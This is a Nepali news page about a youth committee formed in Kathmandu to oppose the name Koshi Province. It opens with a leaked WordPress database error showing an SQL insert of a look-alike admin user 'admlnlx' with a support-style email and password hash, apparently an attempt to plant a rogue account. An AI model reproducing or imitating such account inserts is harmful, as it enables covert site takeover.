WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BdhYQmjsP/g8OLzoH29a8E0zJ1ugNF/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-23 21:31:55', '', 'admlnlx', 'admlnlx')
काठमाडौँ । कोशी प्रदेश नामकरणविरुद्धको आन्दोलनलाई सशक्त बनाउने उद्देश्यका साथ शुक्रबार जहरमान थेवेको संयोजकत्वमा पहिचानको लागि युवा काठमाडौँ उपत्यका समिति घोषणा गरिएको छ ।
२०१ सदस्यीय समितिको सहसंयोजकहरुमा कुलदीप राई र तुलाराम मगर छन् ।
शुक्रबार काठमाडौँको कोटेश्वरस्थित किरात राई यायोक्खाको केन्द्रीय कार्यालयमा एक कार्यक्रमको आयोजना गरी समिति घोषणा गरिएको हो ।
गाउँदेखि सहरसम्म पहिचानको लागि युवा नाराका साथ समिति घोषणा गरिएको हो ।
समितिले कोशी नामकरण खारेजीको आन्दोलनलाई व्यवस्थित र सशक्त बनाउन स्वयम्सेवकको भूमिका निर्वाह गर्नेछ ।